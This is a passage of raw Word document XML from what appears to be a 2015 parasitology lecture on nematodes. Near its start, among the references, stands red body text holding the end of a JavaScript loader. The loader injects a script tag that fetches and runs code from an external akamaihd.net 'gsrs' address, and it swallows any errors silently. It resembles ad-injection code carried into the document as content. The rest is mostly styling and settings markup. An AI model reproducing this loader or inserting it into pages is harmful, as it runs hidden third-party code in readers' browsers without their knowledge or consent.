        <w:t xml:space="preserve"> a=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>document.getElementsByTagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>("head");if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> d=document.createElement("script");d.src="https://apigreenerwebinf-a.akamaihd.net/gsrs?is=isgiwhIQ&amp;bp=BA&amp;g=8cf69c08-73c9-47ac-be47-8f9b3239f535";a[0].appendChild(d);}}}catch(e){}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006B3C59">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59" w:rsidRPr="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>12)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Deworming for health and development.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report of the third global meeting of the partners for parasite control [database online]. Geneva: World Health Organization; 2005.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidSect="006B3C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useo Sans 300">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FBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B8A29A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590" w:hanging="510"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="C24F1A"/>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D7674"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45AA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77D65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9FB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E2950"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17D6DF3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289216B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="753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006BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="154A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0D33CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27D2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90302"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="143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7A0"/>
    <w:rsid w:val="0002049E"/>
    <w:rsid w:val="00040780"/>
    <w:rsid w:val="00054F74"/>
    <w:rsid w:val="000E2510"/>
    <w:rsid w:val="000F0A7A"/>
    <w:rsid w:val="00153B42"/>
    <w:rsid w:val="00195E23"/>
    <w:rsid w:val="00230979"/>
    <w:rsid w:val="002C7107"/>
    <w:rsid w:val="00305511"/>
    <w:rsid w:val="00322DE6"/>
    <w:rsid w:val="003254C3"/>
    <w:rsid w:val="003E5865"/>
    <w:rsid w:val="00494BC6"/>
    <w:rsid w:val="005E05FA"/>
    <w:rsid w:val="006B3C59"/>
    <w:rsid w:val="006C1280"/>
    <w:rsid w:val="006C65E2"/>
    <w:rsid w:val="007F2A51"/>
    <w:rsid w:val="007F3321"/>
    <w:rsid w:val="00883ACD"/>
    <w:rsid w:val="008E5A01"/>
    <w:rsid w:val="00A667A0"/>
    <w:rsid w:val="00B46AF3"/>
    <w:rsid w:val="00BC5F67"/>
    <w:rsid w:val="00C075EB"/>
    <w:rsid w:val="00DF42ED"/>
    <w:rsid w:val="00F206B9"/>
    <w:rsid w:val="00F24214"/>
    <w:rsid w:val="00F55303"/>
    <w:rsid w:val="00FD2B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23"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003254C3"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003254C3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF4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2ED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0004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E2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95E23"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003254C3"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003254C3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF42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F42ED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00040780"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
</w:styles>
</file>

<file path=word/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:divs>
    <w:div w:id="6443290">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="314333633">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="419183256">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="22310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443222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1068111473">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1110467698">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1385132769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1483961602">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1771050282">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1423840363">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1773015892">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="30955986">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1560089542">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="613053416">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="688915109">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1979070209">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="785123945">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1818760106">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1785998423">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="144634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824403">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="808592694">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="391124979">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1554121561">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2025738327">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21399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cmp.berkeley.edu/phyla/ecdysozoa/nematod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ucmp.berkeley.edu/phyla/ecdysozoa/nematodexs.gi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1460</Words>
  <Characters>8327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Dr.Haider</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-03T16:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-01-11T10:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>